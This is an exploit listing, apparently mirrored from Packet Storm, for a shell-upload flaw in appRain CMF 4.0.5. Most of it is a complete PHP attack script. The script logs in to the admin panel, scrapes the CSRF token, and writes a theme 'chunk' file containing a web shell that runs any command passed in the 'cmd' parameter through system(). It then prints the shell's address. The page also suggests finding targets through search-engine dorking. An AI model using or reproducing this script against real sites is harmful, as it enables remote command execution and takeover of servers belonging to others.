Share
## https://sploitus.com/exploit?id=PACKETSTORM:189763
=============================================================================================================================================
| # Title : appRain CMF 4.0.5 shell upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.
(Related : https://packetstorm.news/files/id/178895/ Related CVE numbers: ) .
[+] save code as poc.php.
[+] Usage: php exploit.php sitename.com username password
[+] PayLoad :
<?php
if ($argc < 4) {
echo "Usage: php script.php <url> <username> <password>\n";
exit(1);
}
$base_url = $argv[1];
$username = $argv[2];
$password = $argv[3];
$session = curl_init();
$login_url = $base_url . '/admin/index.php?id=dashboard';
$login_data = [
'login' => $username,
'password' => $password,
'login_submit' => 'Log+In'
];
$filename = substr(str_shuffle('abcdefghijklmnopqrstuvwxyz0123456789'), 0, 5);
echo "Logging in...\n";
curl_setopt($session, CURLOPT_URL, $login_url);
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($session);
if (strpos($response, 'Dashboard') !== false) {
echo "Login successful\n";
} else {
echo "Login failed\n";
exit();
}
sleep(3);
$edit_url = $base_url . '/admin/index.php?id=themes&action=add_chunk';
curl_setopt($session, CURLOPT_URL, $edit_url);
$response = curl_exec($session);
preg_match('/input type="hidden" id="csrf" name="csrf" value="(.*?)"/', $response, $matches);
if ($matches) {
$token = $matches[1];
} else {
echo "CSRF token could not be found.\n";
exit();
}
$content = '
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET[\'cmd\']))
{
system($_GET[\'cmd\']);
}
?>
</pre>
</body>
</html>
';
$edit_data = [
'csrf' => $token,
'name' => $filename,
'content' => $content,
'add_file' => 'Save'
];
echo "Preparing shell...\n";
curl_setopt($session, CURLOPT_URL, $edit_url);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($edit_data));
$response = curl_exec($session);
sleep(3);
if (curl_getinfo($session, CURLINFO_HTTP_CODE) == 200) {
echo "Your shell is ready: " . $base_url . "/public/themes/default/{$filename}.chunk.php\n";
} else {
echo "Failed to prepare shell.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================